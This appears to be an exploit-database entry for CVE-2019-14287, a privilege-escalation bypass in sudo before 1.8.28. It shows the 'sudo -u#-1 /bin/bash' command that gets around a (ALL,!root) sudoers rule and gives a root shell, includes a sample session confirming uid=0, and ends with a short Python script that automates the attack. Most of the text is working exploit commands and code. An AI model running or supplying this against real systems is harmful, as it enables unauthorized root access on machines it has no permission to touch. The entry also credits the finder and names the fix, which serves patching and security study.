# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287
'''Check for the user sudo permissions
sudo -l
User hacker may run the following commands on kali:
(ALL, !root) /bin/bash
So user hacker can't run /bin/bash as root (!root)
User hacker sudo privilege in /etc/sudoers
# User privilege specification
hacker ALL=(ALL,!root) /bin/bash
With ALL specified, user hacker can run the binary /bin/bash as any user
sudo -u#-1 /bin/bash
Example :
hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id
and /bin/bash is executed with root permission
Proof of Concept Code :
How to use :
python3 sudo_exploit.py
import os
#Get current username
username = input("Enter current username :")
#check which binary the user can run with sudo
os.system("sudo -l > priv")
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
binary_file = open("binary")
binary= binary_file.read()
#execute sudo exploit
print("Lets hope it works")
os.system("sudo -u#-1 "+ binary)